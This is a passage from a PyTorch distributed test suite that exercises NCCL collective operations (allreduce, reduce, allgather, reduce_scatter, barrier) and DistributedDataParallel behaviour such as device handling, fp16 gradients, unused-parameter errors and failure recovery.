store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
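# GPU i starts with the value i + 1, so after SUM every tensor should hold
# 1 + 2 + ... + num_gpus = num_gpus * (num_gpus + 1) / 2, which the loop below checks.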
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
# Each rank contributes one tensor regardless of GPU count
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticipate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticipate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticipate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# Input layout: GPU i on this rank holds virtual_world_size consecutive
# integers starting at rank * num_gpus + i; the reduce_scatter calls below
# reduce these runs element-wise across GPUs and scatter one element back per GPU.
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
# Each rank contributes one tensor regardless of GPU count
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Run the allreduce collective on groups of
# 2, 3, ..., self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
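# Each sub-list of size i held the values 1..i (one per GPU), so after the
# allreduce every entry should equal 1 + 2 + ... + i = i * (i + 1) / 2.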
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and will throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions triggers an
# error when `backward` is called (fc3 appears unused to DDP yet still
# receives a gradient, so its parameter is marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has its gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have its gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
